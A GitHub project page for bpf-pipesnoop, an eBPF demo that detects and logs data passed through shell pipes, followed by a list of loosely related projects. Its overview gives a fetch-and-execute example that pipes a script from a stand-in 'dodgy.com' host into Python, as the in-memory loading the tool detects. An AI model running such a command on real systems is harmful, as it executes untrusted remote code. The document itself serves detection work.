Example program using eBPF to log data being based in using shell pipes

BPF-PipeSnoop

Example program using eBPF to log data being based in using shell pipes (|)

Accompanies my blog Using eBPF to uncover in-memory loading

Overview

Shells can parse data between programs using pipes, e.g.:

curl https://dodgy.com/loader.py | python -

In this example, a python script is downloaded from the internet and executed, without the file being written to disk, and its content is not visible on the commnandline.

pipesnoop is a demonstration of how you could detect when data is being passed using pipes and log it, all using eBPF.

Building

# First clone the repository and the libbpf submodule
git clone --recursive https://github.com/pathtofile/bpf-pipesnoop.git
cd bpf-pipesnoop/src
make

This should generate the program pipesnoop in the same directory.

Running

Just run as root and watch the output:

sudo ./pipesnoop

How it works

(Note experts will have better descripion than this) When bash is given a command to run multiple programs with a pipe in between, a number of things happen. If the example is:

bash -c "apple | banana"

Then this will happen:

Bash pipe

bash will use the syscall pipe to create an annonamous pipe. This returns two file descriptors, 1 for each end of the pip, e.g. fds 3 and 4.

Bash clone

bash will call clone twice to create apple and banana. Both programs inhearet all of bash's fds, so they also has fds 3 and 4. important note this means both apple and banana start running at (almost) the same time, i.e. banana does not wait for apple to finish before running.

Apple close and dup2

apple will close one end of the pipe e.g. 3, then call dup2 to overwrite its stdout or 1 fd with the non-closed end of the pipe, e.g. dup2(4, 1).

Banana close and dup2

banana will close the other end of the pipe, e.g. 4, then call dup2 to overwrite its stdin or 0 fd with the non-closed end of the pipe, e.g. dup2(3, 0).

Apple write

apple will start writing data to stdout like normal, but due to the dup2 call it ends up instead into the pipe.

Banana read

banana will start reading data from its stdin like normal, but due to the dup2 call it ends up instead reading from the pipe.

Pipe close

When apple closes, it will send an 'end of stream' down the pipe, so banana knows it has finished reading.

Aknowledgements

The skeleton of this project was made with the help of Libpf-Bootstrap.

Owner
pat_h/to/file
[email protected]
pat_h/to/file
https://github.com/pathtofile/bpf-pipesnoop
Similar Resources

An Ultra Low Power temperature logger based on the ESP8266 MCU.

An Ultra Low Power temperature logger based on the ESP8266 MCU.

Temperature logging IoT node Overview: The real node wired on a breadboard This is an ultra low power (ULP) temperature logging IoT node based on the

Nov 16, 2022

Building a basic logger from scratch using the C programming language.

Logger Building a basic logger from scratch using the C programming language. Compiling and Running the program: Using the gcc compiler: gcc example.c

May 14, 2022

Log.c2 is based on rxi/log.c with MIT LICENSE which is inactive now. Log.c has a very flexible and scalable architecture

log.c2 A simple logging library. Log.c2 is based on rxi/log.c with MIT LICENSE which is inactive now. Log.c has a very flexible and scalable architect

Feb 13, 2022

Mini-async-log-c - Mini async log C port. Now with C++ wrappers.

Description A C11/C++11 low-latency wait-free producer (when using Thread Local Storage) asynchronous textual data logger with type-safe strings. Base

Nov 9, 2022

Simple application log library. supporting multiple log levels, custom output & flash memory support.

Simple application log library. supporting multiple log levels, custom output & flash memory support.

ArduinoLog - C++ Log library for Arduino devices An minimalistic Logging framework for Arduino-compatible embedded systems. ArduinoLog is a minimalist

Nov 12, 2022

simple c program thats spawns a shell wants executed, this shell will detect your os and upon entering will erase or reset the system V1.0

kill-shell simple c program thats spawns a shell wants executed, this shell will detect your os and upon entering will erase or reset the system V1.0

Oct 18, 2021

Techniques based on named pipes for pool overflow exploitation targeting the most recent (and oldest) Windows versions

Table of Contents Table of Contents Introduction Named-Pipes Introduction Exploitation Spraying the non-paged pool Memory Disclosure/Arbitrary Read Co

Dec 16, 2022

Example how to run eBPF probes without a usermode process using fentry

Pinning eBPF Probes Simple example to demonstrate how to pin kernel function and syscall probes. Overview From my reading of the kernel code, KProbe a

Jun 7, 2021

Tiny and cheap robot car for inspecting sewer pipes = 125 mm. With pan servo for the ESP32-Cam module

Tiny and cheap robot car for inspecting sewer pipes >= 125 mm. With pan servo for the ESP32-Cam module

ESP32-Cam Sewer inspection car Version 1.0.0 - work in progress Based on esp32-cam-webserver by Owen Carter. Additional Features Pan servo for the ESP

Nov 6, 2022

Client Server Simulation with FIFOs in C (Named Pipes)

Client-Server-Sim-in-C Client Server Simulation with FIFOs in C (Named Pipes) There are a number of ways to enable inter-process communication i.e Soc

Nov 24, 2021

Cobalt Strike BOF to list Windows Pipes & return their Owners & DACL Permissions

Cobalt Strike BOF to list Windows Pipes & return their Owners & DACL Permissions

xPipe Cobalt Strike BOF (x64) Cobalt Strike Beacon Object File (BOF) to list active Pipes & return their Owner & Discretionary Access Control List (DA

Nov 9, 2022

crypted admin shell: SSH-like strong crypto remote admin shell for Linux, BSD, Android, Solaris and OSX

crypted admin shell: SSH-like strong crypto remote admin shell for Linux, BSD, Android, Solaris and OSX

crypted admin shell: SSH-like strong crypto remote admin shell for Linux, BSD, Android, Solaris and OSX

Jan 2, 2023

Pine's ok shell, a shell in C++

POSH Pine's ok shell, a shell in C++ Answers to questions nobody asked. "Is your name Pine?" No, although that would be neat. Pine is supposed to be a

Nov 6, 2021

SimPle SHell - minimalist Unix interactive shell written in a single C file

SimPle SHell - minimalist Unix interactive shell written in a single C file. The shell does not support scripting yet and is in an early stage of development. If you notice any bug, please open an issue on github.

Oct 24, 2021

My_Shell is a user-defined interactive shell written in C that works similar to the original shell in linux

MY_SHELL Overview My_Shell is a user-defined interactive shell written in C that works similar to the original shell and it can execeute many of the l

Nov 22, 2021

Algo-Tree is a collection of Algorithms and data structures which are fundamentals to efficient code and good software design. Creating and designing excellent algorithms is required for being an exemplary programmer. It contains solutions in various languages such as C++, Python and Java.

Algo-Tree is a collection of Algorithms and data structures which are fundamentals to efficient code and good software design. Creating and designing excellent algorithms is required for being an exemplary programmer. It contains solutions in various languages such as C++, Python and Java.

Algo-Tree 🌲 Algo-Tree is a collection of Algorithms and data structures which are fundamentals to efficient code and good software design. Creating a

Dec 2, 2022

Data Structures concepts being implemented to build the Game of Life

The Game of Life Data Structures concepts being implemented to build the Game of Life which is a cellular automation devised by the mathematician Jame

Sep 5, 2021

Is a linear data structure with O(log n) searches and O(cbrt n) insertions and index lookups.

Is a linear data structure with O(log n) searches and O(cbrt n) insertions and index lookups.

A binary cube is a linear data structure that contains a sorted two dimensional dynamic array of nodes which each point to a sorted array

Jul 13, 2022

RocketOS is a Unix based OS that uses legacy BIOS and GRUB and is written in C17. It is being developed for educational purposes primarily, but it still is a serious project. It is currently in its infancy.

RocketOS What is RocketOS? RocketOS is a Unix based OS that uses legacy BIOS and GRUB and is written in C17. It is being developed for educational pur

Sep 19, 2022
Related tags
Logging bpf-pipesnoop
Mini-async-log-c - Mini async log C port. Now with C++ wrappers.

Description A C11/C++11 low-latency wait-free producer (when using Thread Local Storage) asynchronous textual data logger with type-safe strings. Base

Nov 9, 2022
log4cplus is a simple to use C++ logging API providing thread-safe, flexible, and arbitrarily granular control over log management and configuration. It is modelled after the Java log4j API.

% log4cplus README Short Description log4cplus is a simple to use C++17 logging API providing thread--safe, flexible, and arbitrarily granular control

Jan 4, 2023
A revised version of NanoLog which writes human readable log file, and is easier to use.
 A revised version of NanoLog which writes human readable log file, and is easier to use.

NanoLogLite NanoLogLite is a revised version of NanoLog, and is easier to use without performance compromise. The major changes are: NanoLogLite write

Nov 22, 2022
Log engine for c plus plus
 Log engine for c plus plus

PTCLogs library PTCLogs is a library for pretty and configurable logs. Installation To install the library (headers and .so file), clone this repo and

May 20, 2022
Cute Log is a C++ Library that competes to be a unique logging tool.

Cute Log Cute Log is a C++ Library that competes to be a unique logging tool. Version: 2 Installation Click "Code" on the main repo page (This one.).

Oct 13, 2022
Compressed Log Processor (CLP) is a free tool capable of compressing text logs and searching the compressed logs without decompression.

CLP Compressed Log Processor (CLP) is a tool capable of losslessly compressing text logs and searching the compressed logs without decompression. To l

Dec 30, 2022
View and log aoe-api requests and responses

aoe4_socketspy View and log aoe-api requests and responses Part 1: https://www.codereversing.com/blog/archives/420 Part 2: https://www.codereversing.c

Nov 1, 2022
Sagan - a multi-threads, high performance log analysis engine

Sagan - Sagan is a multi-threads, high performance log analysis engine. At it's core, Sagan similar to Suricata/Snort but with logs rather than network packets.

Dec 22, 2022
A DC power monitor and data logger
 A DC power monitor and data logger

Hoverboard Power Monitor I wanted to gain a better understanding of the power consumption of my hoverboard during different riding situations. For tha

May 1, 2021
A BSD-based OS project that aims to provide an experience like and some compatibility with macOS
 A BSD-based OS project that aims to provide an experience like and some compatibility with macOS

What is Helium? Helium is a new open source OS project that aims to provide a similar experience and some compatibiilty with macOS on x86-64 sytems. I

Dec 30, 2022